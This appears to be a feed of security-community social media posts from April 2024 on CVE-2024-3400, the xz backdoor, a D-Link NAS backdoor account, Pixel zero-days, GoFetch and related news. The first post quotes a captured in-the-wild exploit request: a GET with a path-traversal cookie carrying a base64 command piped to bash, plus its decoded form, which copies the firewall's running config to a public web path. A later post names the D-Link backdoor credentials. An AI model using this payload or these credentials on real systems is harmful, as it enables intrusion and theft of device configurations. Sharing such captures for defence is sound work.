From hackinglz on the Nazi site:

Since it's out there now this is what I caught in wild CVE-2024-3400

GET /global-protect/login.esp HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Cookie: SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`echo${IFS}dGFyIC1jemYgL3Zhci9hcHB3ZWIvc3NsdnBuZG9jcy9nbG9iYWwtcHJvdGVjdC9wb3J0YWwvanMvanF1ZXJ5Lm1heC5qcyAvb3B0L3BhbmNmZy9tZ210L3NhdmVkLWNvbmZpZ3MvcnVubmluZy1jb25maWcueG1s|base64${IFS}-d|bash${IFS}-i`

b64 decoded

tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.max.js /opt/pancfg/mgmt/saved-configs/running-config.xml

Taring running config to world readable location in /global-protect/portal/js/jquery.max.js

I was reminded of the great #Cisco security fix of 2019

#curl

We've officially reached the stage of the LLM information crisis in which the normal 0-day lifecycle must now include a check against LLM-generated garbage.

Repos like this one will purport to be proofs-of-concept of new vulnerabilities, when in fact they are simply garbage code generated by a model. The README is also model-generated.

The motivations for this behavior are beyond me. Internet clout maybe? It's unclear, but what is clear is that every new hot button vuln is going to come along with this kind of crap. It's just making defenders' jobs that much harder.

TRUTH SOCIAL SENT ME THEIR SOURCE CODE: https://boehs.org/node/truth-social

Fedi takes another huge win. I wonder what we'll find.

#trump #socialmedia

PSA: there is a guy out there scamming people for exploits and publishing stolen work as their own. the guy is going by "james" (@ Benzoking201 on telegram), jmpe4x on github, and is running a blog at jmpeax[.]dev

he scammed a young researcher for their linux kernel exploit (original researcher's work here: https://github.com/YuriiCrimson/ExploitGSM) by offering $15k and then published a poorly done translation of the writeup as his own.

Lasse Collin in commit message: “The other maintainer suddenly disappeared.” 😆

#jiatan #xz
https://github.com/tukaani-project/xz/commit/77a294d98a9d2d48f7e4ac273711518bf689f5c4

Branch History Injection (BHI) is back! Disclosing Native BHI, bypassing deployed Spectre-v2/BHI mitigations (e.g., eBPF=off) to leak arbitrary kernel/host memory (e.g., root password hash below). Joint work by @sanwieb @hbitmasks @herbertbos @c_giuffrida: https://vusec.net/projects/native-bhi

say hello to ghidriff 🔥

#ghidra #patchdiffing #Python

https://github.com/clearbluejar/ghidriff

Peter Higgs, physicist who proposed Higgs boson, dies aged 94

https://www.theguardian.com/science/2024/apr/09/peter-higgs-physicist-who-discovered-higgs-boson-dies-aged-94

Holy shit, I thought I knew how evil the #SurveillanceAds industry was but here we are:

Two-thirds of European websites just ignore your #cookie choice and track you anyways, researchers from #ETHzurich found. 🤯

https://www.usenix.org/system/files/sec23winter-prepub-107-bouhoula.pdf

#privacy #TrackingFreeAds #consent #gdpr #ePrivacy #BanSurveillanceAdvertising

AI generation when writing software is a false economy. You are replacing writing code with code review. Code review is harder and requires you to already have an understanding of the domain which often means that you would’ve even able to write it yourself to begin with. If you code gen something because you don’t know how to write it yourself, you by definition cannot review it without going though an effort equivalent to writing it yourself in the first place.

Unless of course you don’t care about code review and so doom yourself into treating software like magical incantations that break randomly for no perceivable reason; but no good mage would do that, surely.

Is anyone aware of a list of software and tech companies that have been recently acquired by private equity firms? Seems like when that happens it's time to start yanking all the software/hardware tied to the acquired firm, because any accountability for security has a habit of disappearing when these firms get bought by PE.

Update: Found the chicken bit. This fixes the vulnerability.

"The main problem with the attack is that it's one that cannot be patched in Apple Silicon itself, since its a central part of the design."

Press X to doubt. I guarantee there's a chicken bit in the HID registers to disable the DMP. This could be disabled globally, only for some processes, or even exposed as a syscall to do it dynamically around sensitive code (Apple are not allergic to that, they already have codepaths that twiddle a HID4 bit at runtime).

https://gofetch.fail/

Edit: and just to be clear, this only affects M1 and M2. M3 is working entirely as intended, where the DIT bit disables the DMP. Constant-time, data-independent crypto code is already supposed to be using the Data Independent Timing bit. That's what it's for, we learned of this problem many years ago! Any issues on M3 caused by this problem are a code bug, nothing to do with the chips. The chicken bit story is for M1 and M2, where the bug is that the DIT bit is not hooked up to disable the DMP.

Forget the xz/liblzma backdoor in Linux distros, there's a confirmed backdoor in D-Link Network Attached Storage (NAS) products. Username is messagebus with an empty password. Tracked as CVE-2024-3273 (7.3 high, disclosed 26 March 2024), D-Link refuses to patch it because "All D-Link Network Attached storage has been End of Life and of Service Life for many years [and] the resources associated with these products have ceased their development and are no longer supported" 🔗 https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/

#CVE_2024_3273 #backdoor #xz

You don't need an 8-core CPU and 16 gigabytes of RAM just to jot down some notes. An ESP32 and a handwired keyboard will work quite nicely.

You know...in case you don't have a pen.

https://hackaday.com/2024/04/05/esp32-provides-distraction-free-writing-experience/

"The biggest source of conflict was an amendment ... that would prohibit #databrokers from selling consumer data to #lawenforcement and would require a warrant to access Americans’ information... National #security hawks in #Congress and local law enforcement groups joined forces to kill the amendment, with the National Sheriffs’ Association claiming it would “kneecap law enforcement” in a letter to Congress..."

https://www.theverge.com/2024/4/5/24122079/data-brokers-fisa-extension-nsa-section-702-surveillance-lexis-nexis

I've taken to calling the Bitcoin price ticker "ransomware futures".

Babe wake up, new Google Pixel zero-days just dropped: 🔗 https://source.android.com/docs/security/bulletin/pixel/2024-04-01

• CVE-2024-29745 (information disclosure, high severity)
• CVE-2024-29748 (elevation of privilege, high severity)

Note: There are indications that the following may be under limited, targeted exploitation.

EDIT: Reported by security researcher Daniel Micay of GrapheneOS Foundation who reported that the vulnerabilities were exploited in the wild by forensics companies 🔗 https://grapheneos.social/@GrapheneOS/112204428984003954

CVE-2024-29745 refers to a vulnerability in the fastboot firmware used to support unlocking/flashing/locking. Forensic companies are rebooting devices in After First Unlock state into fastboot mode on Pixels and other devices to exploit vulnerabilities there and then dump memory. We proposed zeroing memory in firmware when rebooting to fastboot mode to wipe out the whole class of attacks. They implemented this by zeroing memory when booting fastboot mode. USB is only enabled by fastboot mode after zeroing the memory is completed, blocking these attacks. GrapheneOS already implemented defenses against this attack before we became aware of it. After becoming aware of this attack against Pixels running the stock OS, we improved our existing defenses and added new ones alongside reporting the firmware weaknesses to get those fixed.

CVE-2024-29748 refers to a vulnerability providing the ability to interrupt a factory reset triggered by a device admin app. It appears they've implemented a partial solution in firmware. See https://grapheneos.social/@GrapheneOS/112162304896898942 about ongoing work we spotted on wipe-without-reboot support.

See related Bleeping Computer reporting: 🔗 https://www.bleepingcomputer.com/news/security/google-fixes-two-pixel-zero-day-flaws-exploited-by-forensics-firms/

#zeroday #eitw #activeexploitation #CVE_2024_29745 #CVE_2024_29748 #Google #Pixel #Android

I always forget the CORE SSH story about @4Dgifts and Futo working on the then SSH implementation, finding a bug, sending the report upstream with a patch, upstream botching the patch and… it was a CRC32 checksum backdoor ("No relation"™ to the current stuff).

You might have seen it in a rather famous film where it is shown to enter the utility services from a pretty green phosphors terminal.

​

Any experienced C developers among my followers? #BoostsWelcome.

Expat, arguably the world's most popular #XML parser, is understaffed and without funding. As #xz has shown, situations like this are dangerous.

Last month, maintainer Sebastian Pipping put up a plea for help at https://github.com/libexpat/libexpat/blob/R_2_6_2/expat/Changes

(I would help myself, but my C skills barely surpass "Hello, World".)

Found via @timbray - https://cosocial.ca/@timbray/112203547801373427

#libexpat
#SoftwareSupplyChainSecurity #OpenSource #OpenSourceMaintainer
#C